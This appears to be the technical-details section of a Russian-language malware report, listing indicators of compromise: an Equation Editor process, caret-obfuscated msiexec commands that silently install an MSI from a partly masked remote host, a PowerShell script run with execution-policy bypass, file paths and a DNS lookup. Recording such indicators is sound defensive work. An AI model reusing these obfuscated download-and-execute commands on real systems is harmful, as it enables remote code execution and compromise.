Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /C m^sie^xec^.exe /i http://ex#####webservices.com/wpp/jlk.msi /qn
- C:\users\public\sysq.ps1
- %TEMP%\msif232.log
- http://ex#####webservices.com/wpp/jlk.msi
- DNS ASK ex#####webservices.com
- '%WINDIR%\installer\msideeb.tmp'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file "C:\Users\Public\sysq.ps1"
- '%WINDIR%\syswow64\cmd.exe' /C m^sie^xec^.exe /i http://ex#####webservices.com/wpp/jlk.msi /qn' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\msiexec.exe' /i http://ex#####webservices.com/wpp/jlk.msi /qn